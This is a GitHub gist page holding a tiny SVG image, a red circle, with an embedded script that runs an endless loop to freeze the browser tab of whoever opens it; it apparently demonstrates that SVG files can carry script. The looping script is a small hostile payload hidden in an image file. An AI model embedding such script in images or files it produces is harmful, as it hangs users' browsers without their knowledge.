Skip to content

Instantly share code, notes, and snippets.

@arthurfiorette
Last active December 11, 2023 17:29
Show Gist options
  • Save arthurfiorette/1ea4ddd6278ce9f2738a4d893f159eca to your computer and use it in GitHub Desktop.
Save arthurfiorette/1ea4ddd6278ce9f2738a4d893f159eca to your computer and use it in GitHub Desktop.
Display the source blob
Display the rendered blob
Raw
<svg height="100" width="100">
<circle cx="50" cy="50" r="40" stroke="black" stroke-width="3" fill="red" />
<script>while(1){Math.random();console.log(1)}</script>
Sorry, your browser does not support inline SVG.
</svg>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment